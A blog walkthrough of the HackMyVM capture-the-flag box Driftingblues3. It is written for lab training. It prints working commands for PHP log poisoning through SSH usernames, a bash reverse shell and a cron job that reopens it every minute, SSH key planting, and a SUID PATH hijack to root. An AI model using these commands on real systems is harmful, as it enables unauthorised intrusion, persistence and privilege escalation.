0xBEN
/
Sign up to 0xBEN!
Already have an account? Sign in

HackMyVM | Driftingblues3

In this walkthrough, I demonstrate how I obtained complete ownership of Driftingblues3 from HackMyVM
0xBEN
5 min read
HackMyVM | Driftingblues3
https://downloads.hackmyvm.eu/driftingblues3.zip
In: HackMyVM, Attack, CTF, Home Lab, Linux, Easy Challenge
ℹ️
I keep all of my distrusted hosts from platforms like HackMyVM on a segmented VLAN -- 10.9.9.0/24 -- that has no internet access

Nmap Results

# Nmap 7.95 scan initiated Sat Jan 10 02:23:44 2026 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.31
Nmap scan report for 10.9.9.31
Host is up (0.00046s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/eventadmins
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 10 02:23:57 2026 -- 1 IP address (1 host up) scanned in 12.67 seconds
ℹ️
Don't miss the opportunity to find some breadcrumbs in the nmap output. You'll notice robots.txt entry of /eventadmins in the tcp/80 output.
echo -e '10.9.9.31\t\tdb3.hmv' | sudo tee -a /etc/hosts

Add an entry for "db3.hmv" in hosts file





Service Enumeration

TCP/80

Penetration Testing

Initial Enumeration

ℹ️
Since this box represents more of a CTF challenge than a traditional web app, we'll skip right to the penetration testing phase instead of the usual walking of the application.
SSH seems to be a clue here, also pointing to "/littlequeenofspades.html"
Base64-encoded data colored in white, so as to make it appear invisible
echo -n 'aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==' | base64 -d
Nested base64-encoded payload
SSH auth log... this may be a log poisoning opportunity if we can inject PHP into the log somehow



Testing Log Injection

This should be injectable, since our username inputs are directly reflected
⚠️
Some older articles will point out that you can do something like ssh "<?php phinfo(); ?>"@db3.hmv , but more recent versions of ssh client will throw an error about invalid usernames. So, you'll need to use another SSH client as a workaround.
hydra -l "<?php echo system(\$_GET['cmd']); ?>" -p '' ssh://db3.hmv

We can use hydra to pass a username with special characters

The username is empty because the PHP was parsed by the server
curl -s 'http://db3.hmv/adminsfixit.php' -G --data-urlencode 'cmd=ls -la'

We'll use -G to tell curl that the data we're passing is for the query string, not the body





Exploit

Log Poisoning -> Reverse Shell

sudo rlwrap nc -lnvp 443

Start a TCP socket to catch the reverse shell

curl -s 'http://db3.hmv/adminsfixit.php' -G --data-urlencode 'cmd=/bin/bash -c '"'"'/bin/bash -i >& /dev/tcp/10.6.6.6/443 0>&1'"'"''

Use '"'"' to nest single quotes within single quotes



Persistence

echo '* * * * * /bin/bash -c '"'"'/bin/bash -i >& /dev/tcp/10.6.6.6/443 0>&1'"'"'' > /tmp/crontab.txt

Run the reverse shell callback every minute

crontab /tmp/crontab.txt

Import the cron job to "www-data" crontab





Post-Exploit Enumeration

Operating Environment

OS & Kernel

Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux

PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

Current User

uid=33(www-data) gid=33(www-data) groups=33(www-data)

bash: sudo: command not found



Users and Groups

Local Users

robertj:x:1000:1000:,,,:/home/robertj:/bin/bash

Local Groups

robertj:x:1000:
operators:x:1001:root,robertj



Network Configurations

Network Interfaces

ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether bc:24:11:94:3b:d8 brd ff:ff:ff:ff:ff:ff
    inet 10.9.9.30/24 brd 10.9.9.255 scope global dynamic ens18
       valid_lft 6150sec preferred_lft 6150sec
    inet6 fe80::be24:11ff:fe94:3bd8/64 scope link 
       valid_lft forever preferred_lft forever

Open Ports

tcp   LISTEN     0      80              127.0.0.1:3306            0.0.0.0:*



Interesting Files

/usr/bin/getinfo

-r-sr-s--- 1 root operators 16704 Jan  4  2021 /usr/bin/getinfo

/home/robertj/.ssh

find / -user robertj -writable 2>/dev/null

drwx---rwx 2 robertj robertj 4096 Jan  4  2021 /home/robertj/.ssh





Privilege Escalation

Lateral to robertj

Writable SSH Directory

ssh-keygen -t rsa -b 4096 -C "" -N "" -f robertj_key

Generate a key pair on attack box

cat ./robertj_key.pub

Copy the public key string to your clipboard

echo 'ssh-rsa AAAAB3NzaC1yc2...[snipped]...' >> /home/robertj/.ssh/authorized_keys

Add the public key to robertj keys file

ssh -i robertj_key robertj@db3.hmv

SSH in as robertj



Becoming Root

SUID File

scp -i robertj_key robertj@db3.hmv:/usr/bin/getinfo .

Copy the file locally for analysis

Looks vulnerable to "$PATH" injection, since it calls system binaries by their relative names
echo -e '#!/usr/bin/env bash\n/bin/bash -ip' > /tmp/ip
chmod +x /tmp/ip
export PATH="/tmp:$PATH"
Now, when "/usr/bin/info" calls "ip address", it will resolve to "/tmp/ip"
Very nice!



Flags

User

413fc08db21285b1f8abea99040b0280

Root

dfb7f604a22928afba370d819b35ec83
Written by
0xBEN

0xBEN

View all posts
Comments
More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.